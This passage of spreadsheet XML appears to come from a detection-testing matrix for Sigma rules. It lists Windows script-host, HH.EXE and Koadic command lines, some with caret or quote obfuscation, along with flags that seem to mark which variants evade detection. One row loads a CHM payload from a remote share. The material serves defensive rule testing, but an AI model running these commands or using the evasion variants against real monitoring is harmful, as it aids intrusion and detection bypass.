      <c r="G2565" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2565" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2565" s="44" t="inlineStr">
        <is>
          <t>Script Interpreter Execution From Suspicious Folder (1228c958-e64e-4e71-92ad-7d429f4138ba)</t>
        </is>
      </c>
      <c r="J2565" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2565" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2566" ht="15.75" customHeight="1" s="42">
      <c r="A2566" s="43" t="n"/>
      <c r="B2566" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_uncommon_extension_exec</t>
        </is>
      </c>
      <c r="C2566" s="44" t="inlineStr">
        <is>
          <t>Cscript/Wscript Uncommon Script Extension Execution</t>
        </is>
      </c>
      <c r="D2566" s="44" t="inlineStr">
        <is>
          <t>99b7460d-c9f1-40d7-a316-1f36f61d52ee</t>
        </is>
      </c>
      <c r="E2566" s="44" t="inlineStr">
        <is>
          <t>cscript.exe //e:Vbs C:\Users\Public\update.log</t>
        </is>
      </c>
      <c r="F2566" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2566" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2566" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2566" s="43" t="inlineStr">
        <is>
          <t>Script Interpreter Execution From Suspicious Folder (1228c958-e64e-4e71-92ad-7d429f4138ba)</t>
        </is>
      </c>
      <c r="J2566" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2566" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2567" ht="15.75" customHeight="1" s="42">
      <c r="A2567" s="43" t="n"/>
      <c r="B2567" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_uncommon_extension_exec</t>
        </is>
      </c>
      <c r="C2567" s="44" t="inlineStr">
        <is>
          <t>Cscript/Wscript Uncommon Script Extension Execution</t>
        </is>
      </c>
      <c r="D2567" s="44" t="inlineStr">
        <is>
          <t>99b7460d-c9f1-40d7-a316-1f36f61d52ee</t>
        </is>
      </c>
      <c r="E2567" s="44" t="inlineStr">
        <is>
          <t>cscript.exe -"/E:vbs" C:\Users\Public\update.log</t>
        </is>
      </c>
      <c r="F2567" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2567" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2567" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2567" s="43" t="inlineStr">
        <is>
          <t>Script Interpreter Execution From Suspicious Folder (1228c958-e64e-4e71-92ad-7d429f4138ba)</t>
        </is>
      </c>
      <c r="J2567" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2567" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2568" ht="15.75" customHeight="1" s="42">
      <c r="A2568" s="43" t="n"/>
      <c r="B2568" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_uncommon_extension_exec</t>
        </is>
      </c>
      <c r="C2568" s="44" t="inlineStr">
        <is>
          <t>Cscript/Wscript Uncommon Script Extension Execution</t>
        </is>
      </c>
      <c r="D2568" s="44" t="inlineStr">
        <is>
          <t>99b7460d-c9f1-40d7-a316-1f36f61d52ee</t>
        </is>
      </c>
      <c r="E2568" s="44" t="inlineStr">
        <is>
          <t>wscript.exe //E:jscript C:\Windows\Temp\hidden_script</t>
        </is>
      </c>
      <c r="F2568" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2568" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2568" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2568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68" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2568" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2569" ht="15.75" customHeight="1" s="42">
      <c r="A2569" s="43" t="n"/>
      <c r="B2569" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_uncommon_extension_exec</t>
        </is>
      </c>
      <c r="C2569" s="44" t="inlineStr">
        <is>
          <t>Cscript/Wscript Uncommon Script Extension Execution</t>
        </is>
      </c>
      <c r="D2569" s="44" t="inlineStr">
        <is>
          <t>99b7460d-c9f1-40d7-a316-1f36f61d52ee</t>
        </is>
      </c>
      <c r="E2569" s="44" t="inlineStr">
        <is>
          <t>wscript.exe //e:jScripT C:\Windows\Temp\hidden_script</t>
        </is>
      </c>
      <c r="F2569" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2569" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2569" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2569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69" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2569" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2570" ht="15.75" customHeight="1" s="42">
      <c r="A2570" s="43" t="n"/>
      <c r="B2570" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_uncommon_extension_exec</t>
        </is>
      </c>
      <c r="C2570" s="44" t="inlineStr">
        <is>
          <t>Cscript/Wscript Uncommon Script Extension Execution</t>
        </is>
      </c>
      <c r="D2570" s="44" t="inlineStr">
        <is>
          <t>99b7460d-c9f1-40d7-a316-1f36f61d52ee</t>
        </is>
      </c>
      <c r="E2570" s="44" t="inlineStr">
        <is>
          <t>wscript.exe //E:JsCRIPT C:\Windows\Temp\hidden_script</t>
        </is>
      </c>
      <c r="F2570" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2570" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2570" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2570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70" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2570" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2571" ht="15.75" customHeight="1" s="42">
      <c r="A2571" s="43" t="n"/>
      <c r="B2571" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_uncommon_extension_exec</t>
        </is>
      </c>
      <c r="C2571" s="44" t="inlineStr">
        <is>
          <t>Cscript/Wscript Uncommon Script Extension Execution</t>
        </is>
      </c>
      <c r="D2571" s="44" t="inlineStr">
        <is>
          <t>99b7460d-c9f1-40d7-a316-1f36f61d52ee</t>
        </is>
      </c>
      <c r="E2571" s="44" t="inlineStr">
        <is>
          <t>wscript.exe /"/E:jscript" C:\Windows\Temp\hidden_script</t>
        </is>
      </c>
      <c r="F2571" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2571" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2571" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2571" s="43" t="inlineStr">
        <is>
          <t>Script Interpreter Execution From Suspicious Folder (1228c958-e64e-4e71-92ad-7d429f4138ba); Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33)</t>
        </is>
      </c>
      <c r="J2571" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2571" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2572" ht="15.75" customHeight="1" s="42">
      <c r="A2572" s="43" t="n"/>
      <c r="B2572" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_uncommon_extension_exec</t>
        </is>
      </c>
      <c r="C2572" s="44" t="inlineStr">
        <is>
          <t>Cscript/Wscript Uncommon Script Extension Execution</t>
        </is>
      </c>
      <c r="D2572" s="44" t="inlineStr">
        <is>
          <t>99b7460d-c9f1-40d7-a316-1f36f61d52ee</t>
        </is>
      </c>
      <c r="E2572" s="44" t="inlineStr">
        <is>
          <t>wscript.exe //E:jsCRIPT C:\Windows\Temp\hidden_script</t>
        </is>
      </c>
      <c r="F2572" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2572" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2572" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2572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72" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2572" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2573" ht="15.75" customHeight="1" s="42">
      <c r="A2573" s="43" t="n"/>
      <c r="B2573" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_uncommon_extension_exec</t>
        </is>
      </c>
      <c r="C2573" s="44" t="inlineStr">
        <is>
          <t>Cscript/Wscript Uncommon Script Extension Execution</t>
        </is>
      </c>
      <c r="D2573" s="44" t="inlineStr">
        <is>
          <t>99b7460d-c9f1-40d7-a316-1f36f61d52ee</t>
        </is>
      </c>
      <c r="E2573" s="44" t="inlineStr">
        <is>
          <t>wscript.exe //E:JscRiPT C:\Windows\Temp\hidden_script</t>
        </is>
      </c>
      <c r="F2573" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2573" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2573" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2573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73" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2573" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2574" ht="15.75" customHeight="1" s="42">
      <c r="A2574" s="43" t="n"/>
      <c r="B2574" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_uncommon_extension_exec</t>
        </is>
      </c>
      <c r="C2574" s="44" t="inlineStr">
        <is>
          <t>Cscript/Wscript Uncommon Script Extension Execution</t>
        </is>
      </c>
      <c r="D2574" s="44" t="inlineStr">
        <is>
          <t>99b7460d-c9f1-40d7-a316-1f36f61d52ee</t>
        </is>
      </c>
      <c r="E2574" s="44" t="inlineStr">
        <is>
          <t>wscript.exe //E:JscrIPt C:\Windows\Temp\hidden_script</t>
        </is>
      </c>
      <c r="F2574" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2574" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2574" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2574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574" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2574" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2575" ht="15.75" customHeight="1" s="42">
      <c r="A2575" s="43" t="n"/>
      <c r="B2575" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_uncommon_extension_exec</t>
        </is>
      </c>
      <c r="C2575" s="44" t="inlineStr">
        <is>
          <t>Cscript/Wscript Uncommon Script Extension Execution</t>
        </is>
      </c>
      <c r="D2575" s="44" t="inlineStr">
        <is>
          <t>99b7460d-c9f1-40d7-a316-1f36f61d52ee</t>
        </is>
      </c>
      <c r="E2575" s="44" t="inlineStr">
        <is>
          <t>wscript.exe "C:\Users\Public\payload.vbs"</t>
        </is>
      </c>
      <c r="F2575" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2575" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2575" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2575" s="43" t="inlineStr">
        <is>
          <t>Script Interpreter Execution From Suspicious Folder (1228c958-e64e-4e71-92ad-7d429f4138ba); Potential Dropper Script Execution Via WScript/CScript (cea72823-df4d-4567-950c-0b579eaf0846)</t>
        </is>
      </c>
      <c r="J2575" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2575" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2576" ht="15.75" customHeight="1" s="42">
      <c r="A2576" s="43" t="inlineStr">
        <is>
          <t>t1059.007</t>
        </is>
      </c>
      <c r="B2576" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2576" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2576" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2576" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\malicious.chm</t>
        </is>
      </c>
      <c r="F2576" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2576" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2576" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2576" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J2576" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2576" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2577" ht="15.75" customHeight="1" s="42">
      <c r="A2577" s="43" t="inlineStr">
        <is>
          <t>t1059.007</t>
        </is>
      </c>
      <c r="B2577" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2577" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2577" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2577" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\help_document.chm</t>
        </is>
      </c>
      <c r="F2577" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2577" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2577" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2577" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J2577" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2577" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2578" ht="15.75" customHeight="1" s="42">
      <c r="A2578" s="43" t="inlineStr">
        <is>
          <t>t1059.007</t>
        </is>
      </c>
      <c r="B2578" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2578" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2578" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2578" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\APPDAT~1\Local\Temp\malicious.chm</t>
        </is>
      </c>
      <c r="F2578" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2578" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2578" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2578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578" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2578" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2579" ht="15.75" customHeight="1" s="42">
      <c r="A2579" s="43" t="inlineStr">
        <is>
          <t>t1059.007</t>
        </is>
      </c>
      <c r="B2579" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2579" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2579" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2579" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Windows\System32\oobe\msoobe.chm</t>
        </is>
      </c>
      <c r="F2579" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2579" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2579" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2579" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J2579" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2579" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2580" ht="15.75" customHeight="1" s="42">
      <c r="A2580" s="43" t="inlineStr">
        <is>
          <t>t1059.007</t>
        </is>
      </c>
      <c r="B2580" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2580" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2580" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2580" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\document.chm</t>
        </is>
      </c>
      <c r="F2580" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2580" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2580" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2580" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J2580" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2580" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2581" ht="15.75" customHeight="1" s="42">
      <c r="A2581" s="43" t="inlineStr">
        <is>
          <t>t1059.007</t>
        </is>
      </c>
      <c r="B2581" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2581" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2581" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2581" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F2581" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2581" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2581" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2581" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J2581" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2581" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2582" ht="15.75" customHeight="1" s="42">
      <c r="A2582" s="43" t="inlineStr">
        <is>
          <t>t1059.007</t>
        </is>
      </c>
      <c r="B2582" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2582" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2582" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2582" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F2582" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2582" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2582" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2582" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J2582" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2582" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2583" ht="15.75" customHeight="1" s="42">
      <c r="A2583" s="43" t="inlineStr">
        <is>
          <t>t1059.007</t>
        </is>
      </c>
      <c r="B2583" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2583" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2583" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2583" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F2583" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2583" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2583" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2583" s="43" t="n"/>
      <c r="J2583" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2583" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2584" ht="15.75" customHeight="1" s="42">
      <c r="A2584" s="43" t="inlineStr">
        <is>
          <t>t1059.007</t>
        </is>
      </c>
      <c r="B2584" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2584" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2584" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2584" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F2584" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2584" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2584" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2584" s="43" t="n"/>
      <c r="J2584" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2584" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2585" ht="15.75" customHeight="1" s="42">
      <c r="A2585" s="43" t="inlineStr">
        <is>
          <t>t1059.007</t>
        </is>
      </c>
      <c r="B2585" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2585" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2585" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2585" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update_help.chm</t>
        </is>
      </c>
      <c r="F2585" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2585" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2585" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2585" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J2585" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2585" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2586" ht="15.75" customHeight="1" s="42">
      <c r="A2586" s="43" t="inlineStr">
        <is>
          <t>t1059.007</t>
        </is>
      </c>
      <c r="B2586" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2586" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2586" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2586" s="44" t="inlineStr">
        <is>
          <t>hh.exe \\192.168.1.100\share\payload.chm</t>
        </is>
      </c>
      <c r="F2586" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2586" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2586" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2586" s="43" t="inlineStr">
        <is>
          <t>Remote CHM File Download/Execution Via HH.EXE (f57c58b3-ee69-4ef5-9041-455bf39aaa89); HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J2586" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2586" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2587" ht="15.75" customHeight="1" s="42">
      <c r="A2587" s="43" t="inlineStr">
        <is>
          <t>t1059.007</t>
        </is>
      </c>
      <c r="B2587" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2587" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2587" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2587" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update.chm</t>
        </is>
      </c>
      <c r="F2587" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2587" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2587" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2587" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J2587" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2587" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2588" ht="15.75" customHeight="1" s="42">
      <c r="A2588" s="43" t="inlineStr">
        <is>
          <t>t1059.007</t>
        </is>
      </c>
      <c r="B2588" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2588" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2588" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2588" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\user\DOWNLO~1\malicious.chm</t>
        </is>
      </c>
      <c r="F2588" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2588" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2588" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2588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588" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2588" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2589" ht="15.75" customHeight="1" s="42">
      <c r="A2589" s="43" t="n"/>
      <c r="B2589" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2589" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2589" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2589" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"^q" /^c c^hcp 437</t>
        </is>
      </c>
      <c r="F2589" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2589" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2589" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2589" s="44" t="n"/>
      <c r="J2589" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2589" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2590" ht="15.75" customHeight="1" s="42">
      <c r="A2590" s="43" t="n"/>
      <c r="B2590" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2590" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2590" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2590" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"^q" /"^c" c^hcp 437</t>
        </is>
      </c>
      <c r="F2590" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2590" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2590" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2590" s="44" t="n"/>
      <c r="J2590" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2590" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2591" ht="15.75" customHeight="1" s="42">
      <c r="A2591" s="43" t="n"/>
      <c r="B2591" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2591" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2591" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2591" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"^q" /^C c^hcp 437</t>
        </is>
      </c>
      <c r="F2591" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2591" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2591" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2591" s="44" t="n"/>
      <c r="J2591" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2591" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2592" ht="15.75" customHeight="1" s="42">
      <c r="A2592" s="43" t="n"/>
      <c r="B2592" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2592" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2592" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2592" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /^q /^C c^hcp 437</t>
        </is>
      </c>
      <c r="F2592" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2592" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2592" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2592" s="44" t="inlineStr">
        <is>
